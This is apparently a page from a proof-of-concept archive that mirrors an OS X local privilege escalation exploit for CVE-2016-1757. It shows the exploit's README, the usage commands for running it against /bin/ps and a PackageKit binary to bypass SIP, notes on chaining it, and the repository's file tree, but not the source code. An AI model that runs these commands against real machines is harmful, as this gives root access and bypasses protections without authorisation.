Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2016-1757 PoC — Apple iOS和OS X kernel 竞争条件漏洞

Source
https://github.com/gdbinit/mach_race
Associated Vulnerability
Title:Apple iOS和OS X kernel 竞争条件漏洞 (CVE-2016-1757)
Description:Apple iOS和OS X都是美国苹果(Apple)公司的产品。前者是为移动设备所开发的一套操作系统,后者是为Mac计算机所开发的一套专用操作系统。Kernel是其中的一个内核组件。 Apple iOS 9.3之前版本和OS X 10.11.4之前版本的kernel中存在竞争条件漏洞。攻击者可借助特制的应用程序利用该漏洞以提升的权限执行任意代码。
Description
Exploit code for CVE-2016-1757
Readme
Mach Race OS X Local Privilege Escalation Exploit

(c) fG! 2015, 2016, reverser@put.as - https://reverse.put.as

----------------

A SUID, SIP, and binary entitlements universal OS X exploit (CVE-2016-1757).

----------------

Usage against a SUID binary:

./mach_race_server /bin/ps _compat_mode

for i in `seq 0 1000000`; do ./mach_race_client /bin/ps; done

Against an entitled binary to bypass SIP:

./mach_race_server /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/system_shove _geteuid

for i in `seq 0 1000000`; do ./mach_race_client /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/system_shove; done

Note: because the service name is not modified you can't chain this exploit from user to root and then use it to bypass SIP since bootstrap_register2 will fail the second time (service is already registered with launchd from the first run). The solution is to add a parameter to use a different service name for example.

Note2: there's no need to make this into two separate apps, a single binary works, you just need to fork a server and client.

----------

References:

https://reverse.put.as/wp-content/uploads/2016/04/SyScan360_SG_2016_-_Memory_Corruption_is_for_wussies.pdf

http://googleprojectzero.blogspot.pt/2016/03/race-you-to-kernel.html

--------------

Tested against Mavericks 10.10.5, Yosemite 10.10.5, El Capitan 10.11.2 and 10.11.3.

Fixed in El Capitan 10.11.4.

Should work with all OS X versions (depends if bootstrap_register2 exists on older versions).

Alternative implementation with bootstrap_create_server possible for older versions.
File Snapshot

 [4.0K]  /data/pocs/596f9880d5453bb03243e65d7f531bb8c71ec7ff
├── [4.0K]  mach_race_client
│   ├── [4.0K]  mach_race_client
│   │   └── [6.3K]  main.c
│   └── [4.0K]  mach_race_client.xcodeproj
│       └── [8.6K]  project.pbxproj
├── [4.0K]  mach_race_server
│   ├── [4.0K]  mach_race_server
│   │   ├── [2.3K]  logging.h
│   │   ├── [ 22K]  main.c
│   │   ├── [2.5K]  simple_ipc_common.h
│   │   ├── [6.0K]  utils.c
│   │   └── [2.2K]  utils.h
│   └── [4.0K]  mach_race_server.xcodeproj
│       └── [8.4K]  project.pbxproj
├── [4.0K]  mach_race.xcworkspace
│   └── [ 275]  contents.xcworkspacedata
└── [1.6K]  README.md

7 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.